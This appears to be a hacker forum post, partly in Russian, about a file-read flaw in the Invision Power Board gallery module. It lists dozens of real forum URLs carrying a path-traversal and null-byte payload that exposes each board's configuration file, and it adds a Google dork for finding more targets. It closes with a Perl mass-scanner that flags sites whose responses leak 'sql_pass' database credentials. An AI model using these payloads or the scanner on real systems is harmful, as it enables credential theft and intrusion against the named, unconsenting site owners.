http://www2.nag.ru/forum/index.php?act=module&module=gallery&cmd=viewimage&img=index.gif&file_type=text/html&dir=../conf_global.php%00
http://www.maverickclub.ru/forum/index.php?act=module&module=gallery&cmd=viewimage&img=index.gif&file_type=text/html&dir=../conf_global.php%00
http://www.ajeepear.com/foros/index.php?automodule=gallery&cmd=viewimage&img=index.gif&file_type=text/html&dir=../conf_global.php%00
http://www.gamerenders.com/forum/index.php?act=module&module=gallery&cmd=viewimage&img=index.gif&file_type=text/html&dir=../conf_global.php%00
http://www.tspa.net/index.php?act=module&module=gallery&cmd=viewimage&img=index.gif&file_type=text/html&dir=../conf_global.php%00
http://it2004.jino-net.ru/index.php?act=module&module=gallery&cmd=viewimage&img=index.gif&file_type=text/html&dir=../conf_global.php%00
http://transevroasia.ru/forum1/index.php?&act=module&module=gallery&cmd=viewimage&img=index.gif&file_type=text/html&dir=../conf_global.php%00
http://www.aquahobby.ru/forum/index.php?act=module&module=gallery&cmd=viewimage&img=index.gif&file_type=text/html&dir=../conf_global.php%00
http://swar.ru/ipb/index.php?act=module&module=gallery&cmd=viewimage&img=index.gif&file_type=text/html&dir=../conf_global.php%00

http://www.share.net.ua/forum/index.php?act=module&module=gallery&cmd=viewimage&img=index.gif&file_type=text/plain&dir=../conf_global.php%00
http://forums.overclockersclub.com/index.php?act=module&module=gallery&cmd=viewimage&img=index.gif&file_type=text/plain&dir=../conf_global.php%00
http://lodia.ru/forum/index.php?act=module&module=gallery&cmd=viewimage&img=index.gif&file_type=text/plain&dir=../conf_global.php%00
http://laff.ru/forums/index.php?act=module&module=gallery&cmd=viewimage&img=index.gif&file_type=text/plain&dir=../conf_global.php%00
http://rotd.ru/forum/index.php?act=module&module=gallery&cmd=viewimage&img=index.gif&file_type=text/plain&dir=../conf_global.php%00
https://forum.homei.net.ua/index.php?act=module&module=gallery&cmd=viewimage&img=index.gif&file_type=text/plain&dir=../conf_global.php%00
http://www.softbas.com.ua/forum/index.php?act=module&module=gallery&cmd=viewimage&img=index.gif&file_type=text/plain&dir=../conf_global.php%00
http://forum.animeland.ru/index.php?act=module&module=gallery&cmd=viewimage&img=index.gif&file_type=text/plain&dir=../conf_global.php%00
http://angelnet.ru/forum/index.php?act=module&module=gallery&cmd=viewimage&img=index.gif&file_type=text/plain&dir=../conf_global.php%00
http://www.share.net.ua/forum/index.php?act=module&module=gallery&cmd=viewimage&img=index.gif&file_type=text/plain&dir=../conf_global.php%00
http://www.precon.com/forums/index.php?act=module&module=gallery&cmd=viewimage&img=index.gif&file_type=text/plain&dir=../conf_global.php%00
http://hostel.sibsutis.ru/forum/index.php?act=module&module=gallery&cmd=viewimage&img=index.gif&file_type=text/plain&dir=../conf_global.php%00
http://forums.catgallery.ru/index.php?act=module&module=gallery&cmd=viewimage&img=index.gif&file_type=text/plain&dir=../conf_global.php%00
http://www.pbonline.ru/index.php?act=module&module=gallery&cmd=viewimage&img=index.gif&file_type=text/plain&dir=../conf_global.php%00

http://www.imsboard.net/index.php?act=module&module=gallery&cmd=viewimage&img=index.gif&file_type=text/plain&dir=../conf_global.php%00
http://pepah.net/index.php?act=module&module=gallery&cmd=viewimage&img=index.gif&file_type=text/plain&dir=../conf_global.php%00
http://www.solidpixels.net/index.php?act=module&module=gallery&cmd=viewimage&img=index.gif&file_type=text/plain&dir=../conf_global.php%00
http://www.davewilson.net/domains/sqmp3/forum2/index.php?act=module&module=gallery&cmd=viewimage&img=index.gif&file_type=text/plain&dir=../conf_global.php%00
http://www.alisonmoyetforums.net/forums/index.php?act=module&module=gallery&cmd=viewimage&img=index.gif&file_type=text/plain&dir=../conf_global.php%00
http://www.mxhost.net/forum/index.php?act=module&module=gallery&cmd=viewimage&img=index.gif&file_type=text/plain&dir=../conf_global.php%00
http://www.marveltoys.net/forum/index.php?act=module&module=gallery&cmd=viewimage&img=index.gif&file_type=text/plain&dir=../conf_global.php%00
http://www.mwsoc.org/index.php?act=module&module=gallery&cmd=viewimage&img=index.gif&file_type=text/plain&dir=../conf_global.php%00
http://nsinternational.org/doctortodoctor/index.php?act=module&module=gallery&cmd=viewimage&img=index.gif&file_type=text/plain&dir=../conf_global.php%00
http://sf260.org/MOAForum/index.php?act=module&module=gallery&cmd=viewimage&img=index.gif&file_type=text/plain&dir=../conf_global.php%00
http://www.radserv.org/index.php?act=module&module=gallery&cmd=viewimage&img=index.gif&file_type=text/plain&dir=../conf_global.php%00
http://www.kcdj.org/forums/index.php?act=module&module=gallery&cmd=viewimage&img=index.gif&file_type=text/plain&dir=../conf_global.php%00
http://www.twinsspecial.org/forums/index.php?act=module&module=gallery&cmd=viewimage&img=index.gif&file_type=text/plain&dir=../conf_global.php%00

dork:/ipb/ inurl:module=gallery site:ru ; /forum/ inurl:module=gallery site:ru

/me по просьбе ettee и потому что нечего было делать нопесал чекер форумов на уязвимость в Invision Gallery
Запускаем
perl С:/файл/со/списком/форумов.txt C:/результат.txt
#!perl
use LWP;
$bug = "?act=module&module=gallery&cmd=viewimage&img=index.gif&file_type=text/plain&dir=../conf_global.php%00";
open (LIST, "$ARGV[0]") or die;
open (GOOD, ">$ARGV[1]") or die;
@mas = <LIST>;
print "Parsing...\n";
while (@mas) {
chomp($adr = shift @mas);
$url = "$adr"."$bug";
$con = LWP::UserAgent->new;
$req = HTTP::Request->new(GET => $url);
$resp = $con->request($req);
$src = $resp->content;
print GOOD "$url\n" if ($src =~ /sql_pass/ or $src =~ /function.readfile/);
}
print "Done!\n";

http://envisageportal.en.funpic.org/forum/index.php?act=module&module=gallery&cmd=viewimage&img=index.gif&file_type=text/plain&dir=../conf_global.php%00
http://sidefx.org/forum/index.php?act=module&module=gallery&cmd=viewimage&img=index.gif&file_type=text/plain&dir=../conf_global.php%00
http://forums.minidisc.org/index.php?act=module&module=gallery&cmd=viewimage&img=index.gif&file_type=text/plain&dir=../conf_global.php%00
http://ipb.idler.no-ip.org/index.php?act=module&module=gallery&cmd=viewimage&img=index.gif&file_type=text/plain&dir=../conf_global.php%00
http://www.humelake.org/forum/index.php?act=module&module=gallery&cmd=viewimage&img=index.gif&file_type=text/plain&dir=../conf_global.php%00
http://www.ispc-fl.org/forums/index.php?act=module&module=gallery&cmd=viewimage&img=index.gif&file_type=text/plain&dir=../conf_global.php%00
http://www.gabbafreakz.org/forum/index.php?act=module&module=gallery&cmd=viewimage&img=index.gif&file_type=text/plain&dir=../conf_global.php%00
http://www.portalmagic.org/index.php?act=module&module=gallery&cmd=viewimage&img=index.gif&file_type=text/plain&dir=../conf_global.php%00
http://www.humelake.org/forum/index.php?act=module&module=gallery&cmd=viewimage&img=index.gif&file_type=text/plain&dir=../conf_global.php%00